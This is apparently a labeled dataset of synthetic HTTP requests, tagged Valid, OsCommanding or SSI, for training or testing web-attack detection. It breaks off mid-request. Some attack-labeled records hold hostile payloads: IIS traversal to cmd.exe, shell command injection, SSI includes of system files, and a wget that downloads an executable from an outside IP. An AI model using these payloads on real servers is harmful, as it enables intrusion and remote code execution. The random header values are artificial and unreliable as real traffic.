PUT /gy4nioi7/nu.FSUyn2xv1VAo9cn/tj-lpSZCTz4/hiAdD23eedarektede0/Oupdatez@jxKunion2sF-yd/DhneuDsonc4sn0l9crm/hRK9rHcMkhZY3Q./sO7BYu/EwiC26ebaestootF/iYmNDQbwPKy@LSoERnRs/sPy.mspx? HTTP/1.0
Content-Length: 17
Content-Language: e
Content-Encoding: compress
Content-MD5: dG9sbERzdHVzbjJtM2hibg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jun 06 07:18:19 GMT
Last-Modified: Wed, 19 Jul 06 09:17:16 CET
Host: 101.6.30.216:2
Connection: keep-alive
Accept: video/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 194.216.252.85
Cookie2: $Version="85"
Date: Fri, 29 Feb 08 13:42:52 CET
Expect: fetnagrt=AsLiib
If-None-Match: *
Proxy-Authorization: Digest realm
Referer: /hia6/vaimri/2tao0iee/0aldsa.mpg
User-Agent: ttet/8.0
X-Forwarded-For: 101.215.111.0

wadtapoEreclstx=s

End - Id: 8051
Start - Id: 11524
class: Valid
GET /fd4-OLNzc46E2Cl/zcXtNXFdh3B/ogeHFW8iAuP/us/hiuwtFlp/documentxhDq4FY/osr2zmcNPAWpEvYXs3M0/ueeOy4azsata7NoTss6h/nrUPMDLvDgQh/earrUNJ2qCbGF/Srmvhphniotuecagnenc.exe?imgmxp_joyfeb=c9&br=53321707&mYmr=yoouhs&vU2n31SrP=79219011&dddNiwaOtl8=87&qsa0tshcise=al67bos&dassibpvetdhzh=3878632&1ftpN4gXXVZlhttp=7&dbbTVnspe=nriee&tszu3daeASaeid=242&Htp7=uefadrcAlee HTTP/1.0
Host: 200.22.9.49:9360
Connection: ceedet
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-age=04
Client-ip: 218.0.181.188
Cookie: hwssx=4681458;o8thoceeadgosa=oOnp_-Tbx
Cookie2: $Version="378"
Date: Tue, 09 Sep 08 20:13:58 GMT
ETag: W/"YVB58SHl8HuMD@j"
Expect: iotow
From: ehnhq@sgRig.cz
If-Modified-Since: Fri, 16 Apr 10 18:25:41 CET
If-Unmodified-Since: Fri, 27 Jan 06 14:54:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: Basic dG5lY2l0OnducmZ0VWU=
Range: 00947-01478,11317-321067,-5083
Referer: /nttb/dhsy/7etreqMe/shbb9.msf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 8.9; ts-Lt; rv:1.6.2) Gecko/44606291
UA-CPU: PowerPC
UA-Disp: 9055,045,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9366x217
Via: HTTP/4.9 www.tfvh.js:749
Transfer-Encoding: identity
Upgrade: aka/7.7, e8rTee/4.0, 0ubLe/5.1, tnoOo/9.0
Warning: 522 152.136.158.58 "nxxntaane3s" "Sat, 03 Sep 05 20:12:16 GMT"
X-Forwarded-For: 191.250.24.214
X-Serial-Number: 4914032187639175
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11524
Start - Id: 17656
class: Valid
GET /oTt/xieoes6iapi7dEcl/MyaDuOGLs9/hesohe/dtoe/lh0otheesoyrr4oigwht/urt4tahNhwdzsscutc3/tretep/unmRtp/rYmcm5h03LOsCY/tSnnacaea1gvdcntc2r9.html?2arYJ@EO=A&yEzP=454487&zerooslepn=otmpezdxtnemnt&8a=lok8v&dhenaiMtnqdtet=%5Cha4s4erreplace HTTP/1.0
Host: www.enrdE.st
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.9, euc-tw;q=0.3, x-mac-arabic;q=0.1, iso-8859-1
Accept-Encoding: 
Accept-Language: huhh-tienda
Cache-Control: no-transform
Client-ip: 93.54.113.223
Cookie: nyeedxnrom1eYn= yaJodoilike;asp3u=ofcn1wceeeoyts;3FxTbPR=5;mdclindmjue=258;goabeyhpd=eIbx8t9hcM6e;sne=mTU9SW
Cookie2: $Version="1"
Date: Thu, 29 Sep 05 05:50:20 CET
ETag: W/"YJhwr3KmHodY4T8"
Expect: 100-continue
From: orsph@74It.it
If-Modified-Since: Fri, 16 Jan 09 15:00:50 CET
If-Unmodified-Since: Thu, 19 Nov 09 13:50:23 CET
If-Match: "zScj4NT5WUN0RG0AjQsN"
If-None-Match: "H-TO45ikwC8xoI1CXJ"
If-Range: Sat, 30 Apr 05 20:30:08 CET
Max-Forwards: 4647
MIME-Version: 3.4
Pragma: tEtT=dxeit
Proxy-Authorization: NTLM YXBsZ2N0Z0RuYjFzbnRvUmd0YXJsbnQ4dHN0cnNodHVXZXQwZWVpZWV1aWQ=
Authorization: Basic anZSbjppZ2lzNXN0
Range: -05590
Referer: /Dxwsize/4nisl/djeaf.rar
TE: deflate,trailers,trailers
Trailer: If-Modified-Since
User-Agent: inriroteeSt0dga2
UA-CPU: Sparc
UA-Disp: 4701,7597,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 813x197
Via: 8.3 91.6.104.13
Transfer-Encoding: deflate
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 026 www.rdtne0in.gif "tdiaf7hosrEtNs" "Fri, 13 Aug 04 05:13:22 CET"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17656
Start - Id: 12340
class: Valid
GET /shlesNaiHt8iso8E6mT/eHzQpWNmnN/gomUAxclSi39V/2.Ug1DZqh77Z/nyA.png?athz9=%7Cl8hEh HTTP/1.0
Host: www.r4abemkSeb.it
Connection: tv1Hi
Accept: image/*;q=0.3, video/*;q=0.4, audio/x-wav;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: Jm=eauerr
Client-ip: 219.43.180.17
Cookie: t3o5asnel1ayd=4439;uglrsdmya4nn6=etYustEdkmE'uu
Cookie2: $Version="16"
Date: Mon, 03 Jan 05 13:10:44 CET
ETag: W/"XXk-.8rcqs.YcAa3gY"
Expect: 100-continue
From: mehes@rstuth.com
If-Modified-Since: Thu, 18 May 06 13:15:23 GMT
If-Unmodified-Since: Thu, 17 Sep 09 04:16:36 CET
If-Match: "vkeY@Jt8R_iPJOv"
If-None-Match: "jXbIE3kNbFU1II.CxB"
If-Range: Sun, 27 Sep 09 24:08:57 CET
Max-Forwards: 366
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aW5uZWtjaTpibnN0dTU=
Authorization: Basic amlzdG9wOmlpdGk=
Range: 662-4,8147-,483669-546
Referer: http://www.eokI4.uk/eunnao/ilr7y/t3tn/97sEnams/84On6O.tiff
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Eia6sj1plJenyiera
UA-CPU: Sparc
UA-Disp: 1376,5433,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8258x863
Via: eho31/9.9 112.29.70.98, 8.9 4.95.221.112, ensul/8.8 202.218.240.85
Transfer-Encoding: gzip
Upgrade: got9/5.0
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 7559329085977019735
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12340
Start - Id: 10317
class: Valid
GET /awRLyVmSnt_Im4xpNiw/rg4IaqPNLFL-f/3BblMt/aM8iXGJHjZNaBUJP0/sH.tiff?iuhjsre=hGJ0&vvlns34ee=cagizamfromtmbT&ngcaeo7eabndl0e=78553873&hF=moltiusock_streamn&r2e=vbreplaceWhika0dnnOs&61hno=myi8nihemtoadrn2yd&7ehm0dsriknSd2t=486876 HTTP/1.1
Host: 162.93.241.115
Connection: keep-alive
Accept: text/plain;q=0.4
Accept-Charset: cp-950;q=0.9, cp-932, iso-8859-1, x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 42.80.49.249
Cookie: 8oeyh5Crhk=7@qb;3s=9629;u4lntsrmZ=froma<k edHo;Eel=6584;erhrmEnml5sxtlt=175293
Cookie2: $Version="56"
Date: Wed, 05 Jul 06 08:56:24 CET
ETag: W/"EYezGROZhzumkOacy"
Expect: 100-continue
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Fri, 14 Aug 09 18:30:20 CET
If-Match: "Jad_RqPoY_tnC5ri"
If-None-Match: *
If-Range: Fri, 29 Apr 05 10:01:58 UTC
Max-Forwards: 98
MIME-Version: 3.2
Pragma: smlntmeb='t'
Proxy-Authorization: Digest algorithm=rfff
Authorization: NTLM ZTNmYWVhMXpvdFV1b3llNXNhY1NlNjh6aWFzZEV4cnV6ZQ==
Range: 632334-29563,0-36
Referer: /h6ydo/m6d6vtby/ls4otu/oyra2wRe/lAla0tIn.gif
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.4 (X11; U; Unix 9.8; tw-cn; rv:5.8.2) Gecko/97032478
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 032x7737
Via: 1.7 www.eHpag1e.gif, 1.5 19.138.147.176:40705
Transfer-Encoding: deflate
Upgrade: pnge/0.2
Warning: 896 www.eqtbm.css "nnnsecrhiihdmhtd" "Sun, 24 Jun 07 09:18:57 CET"
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10317
Start - Id: 43927
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.hheeswdet.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic, iso-8859-15;q=0.3
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 22.30.133.135
Cookie: dbejloh=ud.;bxihl=aFmlPB
Cookie2: $Version="32"
Date: Tue, 12 May 09 06:35:55 GMT
ETag: "U0d-NWiKRp2IKGFl-JD"
Expect: nweoMudA
From: ri9h6cs@tZrtxhhdgg.be
If-Modified-Since: Sun, 08 Feb 04 19:19:42 GMT
If-Unmodified-Since: Wed, 28 Jul 04 07:55:27 GMT
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: "ysMR.zfJLfC@VBlM"
If-Range: Fri, 11 Jun 04 01:57:49 GMT
Max-Forwards: 3
MIME-Version: 3.4
Pragma: enlta8='a8fi2M'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 0334-,997362-098401
Referer: /shiit/xdn8Sa/owmapo.cfm
TE: gzip
Trailer: If-None-Match
User-Agent: szebiiaaoq/6.6.4.8
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: HTTP/2.4 www.sdGll.gif
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43927
Start - Id: 880
class: Valid
GET /riXAedlreietnb/tYd/a5/lhoqf/pyiZRime/Kou2orG7u/tI/vqeoneerliuna/m_TC3/ensxcnee6FaombeEqecd.html?to=ztg2sb%24s&bt7iOe=89&nxl1sdt7mr=3&ca6=414829&Z6Y.=dropDnu%7E25exece%2Fe&nhherswnlooWu=sKxnllt-cwnqeufd%293%7Cn&lcsme7r6nedrt=efL&FUEvkQ=ylXkk HTTP/1.1
Host: www.oIe5.ch:80
Connection: close
Accept: video/*;q=0.8, image/*;q=0.5, text/plain
Accept-Charset: windows-1258, cp-932;q=0.8, iso-8859-9, iso-8859-2, us-ascii
Accept-Encoding: *;q=0.0
Accept-Language: s-ebkAxeAu;q=0.0, cdne-Nanpcf7i, 8ei-e, zneo-rhaiij
Cache-Control: no-transform
Client-ip: 200.138.242.236
Cookie: btsmRehtA=eG=t;nti9vdq=20583625;node2ZEALU=anntnchu;oeS=ote~;drop5yV=xnmu
Cookie2: $Version="2"
Date: Fri, 20 May 05 12:24:16 UTC
ETag: W/"axkARQH19Nvohuh2C"
Expect: 100-continue
From: deiSLdc@enaitimcoi.fr
If-Modified-Since: Tue, 18 Aug 09 03:09:09 CET
If-Unmodified-Since: Sun, 20 Sep 09 05:32:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Nov 05 17:53:22 GMT
Max-Forwards: 799
MIME-Version: 0.0
Pragma: 8ws='ni'
Proxy-Authorization: Basic OXhsczppOWFhZmVh
Authorization: NTLM eWlPcHNyUlJjMG9lRTZWNGF3Z2FmaDEyb29ubUgzYXZBZW00b2t2YnJqMjdu
Range: 03-,31-18005,845834-77348
Referer: http://www.ynorta.cz/Egrr.pl
TE: trailers,gzip,chunked
Trailer: Authorization
User-Agent: oesrunG/8.4
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 130x106
Via: FTP/6.7 www.NoeRtxt.gif, HTTP/5.9 www.donwfEE.jpg:213, HTTP/1.8 223.41.133.44
Transfer-Encoding: compress
Upgrade: 3orSlt/1.8, ndNfp3/7.7
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 880
Start - Id: 43973
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.ohDmaI1sds.cz:5772
Connection: tsek
Accept: text/xml;q=0.0
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 9.225.171.68
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Thu, 27 Apr 06 11:59:41 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: Teocbl
From: axenii@lMdner.de
If-Modified-Since: Fri, 23 Sep 05 06:40:53 GMT
If-Unmodified-Since: Sat, 01 May 04 17:53:50 CET
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Wed, 26 Dec 07 09:23:21 CET
Max-Forwards: 145
MIME-Version: 3.0
Pragma: parnlr='erdoa2c'
Proxy-Authorization: Digest nonce
Authorization: NTLM aW5yYXR2ZWVvb2Vlcmllc2VpeG51ZU50ZWhtc1M5b3RtbWpucWhTY3IyYQ==
Range: 2873-08
Referer: http://www.csili.gov/nopm/lhnz9/5obw.dll
TE: trailers
Trailer: Referer
User-Agent: Mozilla/6.4 (X11; U; Open BSD i386 6.8; lb-gh; rv:4.0.8) Gecko/86057734
UA-CPU: StrongARM
UA-Disp: 3500,2136,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: odna/0.5 www.llklra35.gif, htiw/3.3 www.iygyyfy.jpg:426
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 653 www.ltccn7.css "tavffueEmn7akcz" "Fri, 13 Nov 09 20:30:12 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 552046622508653273
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43973
Start - Id: 40593
class: SSI
GET /o2Z4EgfeT/afVx0WqXJT2sZb/enxeiaiba24e/ruC/marttemi9h11oy6nFmlh/ifnrjniuPib0/hnrgorscm/lb6N0tPrDFlnFJk.php4?Eadminsock_streamA_noEOQiV=ereru&cPpkdmaonvna=sIEU&aedler=lNM1t2&tsFfn4T7=0sn0uat&9et=spAe3To&usDrdiij=%3C%21--+++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.1
Host: www.ahoes.de:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ms5-tett;q=0.7, tbraszt-ceanrony, aomnoat-c
Cache-Control: no-cache
Client-ip: 134.133.165.209
Cookie: DnxwL=3;jjimeeiwha=tsiro3mtd7obadr8ls;1tin7trW=732228;iEnaodfteut=v4rrs;SK6xHXsfl=ta
Cookie2: $Version="59"
Date: Mon, 08 Aug 05 15:46:43 UTC
ETag: W/"bb110ijb0AjJQj0"
Expect: Hnueo
From: nIlswt@riaoa.ch
If-Modified-Since: Thu, 19 Nov 09 16:27:12 UTC
If-Unmodified-Since: Thu, 17 Mar 05 20:45:32 UTC
If-Match: "O26NG3kaBELbogXVtt-R"
If-None-Match: *
If-Range: Thu, 22 Apr 04 24:44:13 GMT
Max-Forwards: 4004
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: Digest qop=ccHTr
Range: -4
Referer: http://www.tSde.ch/uysnrtwa/egEni/woob6.tar.gz
TE: gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/9.2 (Windows; U; Windows NT 4.2; n1-Rv; rv:9.9.8) Gecko/35960882
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5535x2253
Via: lwd/7.8 107.67.7.93, FTP/8.6 99.147.225.6:37
Transfer-Encoding: deflate
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40593
Start - Id: 40910
class: SSI
GET /ayxFe/hhherpndltwo4/is6Toan/qmg5nhkucptaidotaH.msf?access_logaVGl24iG=+nlnK&knn9zcenor3=edyl&apppYstyle6=ecs%3C+script8%5CesRbmp+se&9.gB0=onsmr%7Eeu6echol4%3E5xeC&3c317=972668489&ei=5passthrurouheti%5Cutsy&etzshe7ssna=+linkoe%27&w3naw=001319332&KmmmS-OV=4756725&Noahmh4ewnipsO=%3C%21--++%23odbc+connect%3D%22ila%2Cth%2CtCna%22++++++++statement%3D%22select++++*++++from++IiE%22--%3E&uut8=aa0&wqONv=8921089&c_uxVbg2@=1&oed6jilllinqE=ocdivLe%7Csam&immedhTioru=yoaeRtMioaaaeer HTTP/1.1
Host: www.ttindxes.it:80
Connection: keep-alive
Accept: video/*;q=0.0, image/gif;q=0.1, image/png
Accept-Charset: x-mac-chinesesimp;q=0.9, windows-1253
Accept-Encoding: *
Accept-Language: tgi5-a, foH0-msa;q=0.1, edgeabdN-lFherdto;q=0.8
Cache-Control: only-if-cached
Client-ip: 71.125.45.144
Cookie: 9aQemoilrtd=ekehns;aityegeoah=14735;jwSBTVsamtBopt2=10878633;do7nIWloE0dte=7
Cookie2: $Version="3"
Date: Wed, 12 Nov 08 20:11:53 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Tue, 25 Oct 05 17:11:15 CET
If-Match: *
If-None-Match: "XstJE9ZCTYnVm_eI"
If-Range: *
Max-Forwards: 2043
MIME-Version: 7.3
Pragma: tddix='g2a'
Authorization: Digest response="28D7C190ae7D1084Fae9eBD8Bd12f6F4"
Range: -0350,3542-,-6
Referer: /uckaf/saYxes.dll
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.3 (compatible; Konqueror/2.9; Linux i386; snineedut)
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color8
Via: 5.5 134.245.36.38, asay/6.6 223.189.100.48
Transfer-Encoding: gzip
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40910
Start - Id: 33458
class: Valid
POST /fCee/tpelyolscmszeug8ncUL/tpaetabieaD/0aVR@lFk/xsidk.htm? HTTP/1.0
Content-Length: 167
Content-Language: nh
Content-Encoding: compress
Content-Location: /iii0e.sh
Content-MD5: ZTh0Z2xHZWhhcmhmYXg2Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Nov 04 22:21:32 GMT
Last-Modified: Mon, 08 Feb 10 20:40:57 CET
Host: www.7ehLtheSeo.cz
Connection: ikneDNh
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 20.92.114.90
Cookie: ne=icaaw
Cookie2: $Version="15"
Date: Mon, 26 Jan 09 19:39:42 CET
ETag: "OBRpOLDexlTKNOercvA"
Expect: 100-continue
From: rypkuF@annazi.gov
If-Modified-Since: Sat, 16 Dec 06 18:08:55 CET
If-Unmodified-Since: Wed, 12 Aug 09 24:06:26 CET
If-Match: "LNCLCqXJs.E2x478RY"
If-None-Match: *
If-Range: *
Max-Forwards: 579
MIME-Version: 9.1
Pragma: Itatls4='ymticAd'
Proxy-Authorization: Digest nc=84aC5fF6
Authorization: Digest algorithm=MD5
Range: 02748-,068714-
Referer: http://www.wsio.biz/nnymea/pi5ss77/sejr/eflotmuf/fatnJ7y.dll
TE: trailers,gzip;q=0.4,chunked
Trailer: Authorization
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 2.8; eg-kt; rv:9.7.1) Gecko/56325021
UA-CPU: MIPS
UA-Disp: 2518,5185,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 460x027
Via: ertaio/9.3 www.oxBTe.png, FTP/0.0 www.gs5i.shtml, 6.1 www.NNhpfoe.htm
Transfer-Encoding: 1aeN; Beh1=kltode
Upgrade: 03e5/6.4, leni/2.7
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oeyMi6girtouE=e49ueoetheeo&auomlEarsdhr=pdt63l sE&rnt7oyigau=sita zmEo<mc&nrfhtal2rtni=e\S7rgq&weoeyNLsgr=tm0uloget&sNs7=si0l-i:n aolnlo ts&i9autnge6=ofdymhmdnli

End - Id: 33458
Start - Id: 17510
class: Valid
GET /yhdWqoBahf/9lidjatfe/d0Y7GnodeO.html?oithCkas=eaOeoepa&uespaReord5tex=ae9&qwGAX=nM-7mW&aev=6581247&9lohens=urwHy&tbdehgub=2&oir17=g47ngFU4w&nmi=2&io3ehe=vartae8nspeeluElp&gamxtxoo=Hi5Pano&fln=aQmvHaZcElP&esrznrh=82689474&chri3barbyyi9=8145404&itadfeo9ogl=hs%3Ecsev5v+tmpeoci&orheNez2uv=r._hFHr HTTP/1.0
Host: 37.61.78.160:06582
Connection: close
Accept: application/*, video/*, text/xml
Accept-Charset: x-mac-chinesesimp, x-mac-greek, x-mac-arabic;q=0.0, shift_jis
Accept-Encoding: *
Accept-Language: ae-lp;q=0.2, sagMi2ne-deikir2
Cache-Control: oTmsde0='nte'
Client-ip: 252.240.14.144
Cookie: cit=eQG5Rz;homeHL6i7=uuwIrssra$ia;ei7toeqmooruu=374745;eeiesdI=20299887;8ap=yaiiswE;UjmvAa.5us=7551584135
Cookie2: $Version="17"
Date: Mon, 24 Aug 09 02:42:34 CET
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: ettaoe@hoaeEoNn5.it
If-Modified-Since: Sat, 05 Jul 08 11:10:36 GMT
If-Unmodified-Since: Sun, 12 Mar 06 07:53:09 GMT
If-Match: *
If-None-Match: "GCQhOAP@uc4lJCOg"
If-Range: Tue, 21 Apr 09 04:33:46 UTC
Max-Forwards: 5975
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest nc=Fd5bd314
Range: 8940-,0923-,5121-
Referer: /7iegC/phsii/qIE2/wxfne/eale.doc
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: 5anesBye (gaeulJEmU; n-Ieaxc; fKIEHdJ5; toX95f5Q; cVOgaCvpz-)
UA-CPU: x86
UA-Disp: 646,6617,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 936x088
Via: 9.5 178.247.106.96, FTP/6.2 www.tNievO.png
Transfer-Encoding: compress
Upgrade: wys/9.8, dwn/4.4
Warning: 373 146.38.237.78 "npfieGe" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17510
Start - Id: 43527
class: OsCommanding
GET /geimap2/pretseah2tel1/aEhnihh/xwl5scdxjt3dn7/pVoSNPNkthP_H/f1oleArR/cYpg5u_erWt/r62J5LgisBEBNy/yaWWBseX/nX3wxqYWaXGGkZl_s.exe?amd5aed6igsiod=8059332893&1aiEnumH=6974525422&o6abe=ecwarhosrti2zHvar&5thdgt=%5Cn+++wget+http%3A%2F%2F99.125.138.90%3A60%2Fnftp.exe&s5bttnROean=rhyyiomgotbaagccn&e2za=1892272&nina7tnf=ZaUl-ral+ainmetaideletea&zre1d1non0u=anRor&t4xHfoaeNiaO=119703&csfhsmhiaaNeHin=nuaxqicenetc&ENgoidcreplaceJYN=%2BEkap9tx%403&it6Atvohdtoexp1=130740&5RsPngsq6D1=9885&vdimIcvIntrqni=ry_sx2a4Qpn&sMduriNxaestai=9TI%27oee5rm+%29f HTTP/1.0
Host: www.ifoxk0IuiO.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: hvb0=helOnr
Client-ip: 175.223.148.237
Cookie: inihfibteneoc=mSKkjJU
Cookie2: $Version="7"
Date: Sat, 26 Jan 08 24:41:54 GMT
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Sun, 01 Apr 07 17:42:52 UTC
If-Unmodified-Since: Sun, 25 Dec 05 17:46:23 CET
If-Match: *
If-None-Match: "4WppccyxNdCePyZ4i84"
If-Range: *
Max-Forwards: 4460
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic QWFhaWM6cm5pb0Ez
Authorization: aeguo tc1lrtn=rvej
Range: -2781,-259,93-77910
Referer: http://www.sisnar.ch/irsEiai5/iwytoI3t/yerrT/sq5o/ebTtasfc.php3
TE: trailers
Trailer: Expect
User-Agent: Mozilla/0.4 (compatible; Konqueror/9.6; Win98; Lf7ion; ahafoe; mhAl0t9dsp)
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 612x3131
Via: 8.2 www.rlonRrlt.tiff:87527, HTTP/2.3 236.72.8.74
Transfer-Encoding: deaMh
Upgrade: icjo/5.5
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43527
Start - Id: 34233
class: Valid
POST /EcSTM-gx6QW.@/eiliThnan.asp? HTTP/1.0
Content-Length: 233
Content-Language: nssaat,Alt2ie
Content-Encoding: identity
Content-Location: /aoerAhtu.js
Content-MD5: YW5waEFuaDhsMnRuaGlvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Nov 07 12:35:44 UTC
Last-Modified: Tue, 23 Aug 05 10:32:09 GMT
Host: www.roasert.cz
Connection: brojr
Accept: audio/*;q=0.9, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: eohee-D
Cache-Control: min-fresh=9
Client-ip: 128.177.222.246
Cookie: tormfiU=L6eah;ddsu=scAchfocnixajat;te=ledtrbf~vh=q;gid3aftd=etsEtihsheitaodVgr
Cookie2: $Version="29"
Date: Sun, 25 Jun 06 08:03:22 CET
ETag: "cMjEsUucXS2JA0ib"
Expect: 100-continue
From: e4eeec@tlsenuWe.de
If-Modified-Since: Fri, 26 Oct 07 15:07:18 GMT
If-Unmodified-Since: Tue, 10 Nov 09 11:52:06 UTC
If-Match: *
If-None-Match: "uKsX-IMHeY8G01dIz1"
If-Range: "Tca1GTZTxA-S2WFFXsqd"
Max-Forwards: 245
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: Digest cnonce="eeudV"
Range: 63482-01,-87
Referer: http://www.ndant.ch/snugs/aioE.php4
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.2 (Windows; U; Win 9x 6.8; sa-sn; rv:5.8.2) Gecko/11775125
UA-CPU: 68000
UA-Disp: 6221,5236,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5781x4344
Via: eej7e/6.9 34.75.109.115, 1.8 www.neoOdr.shtml
Transfer-Encoding: identity
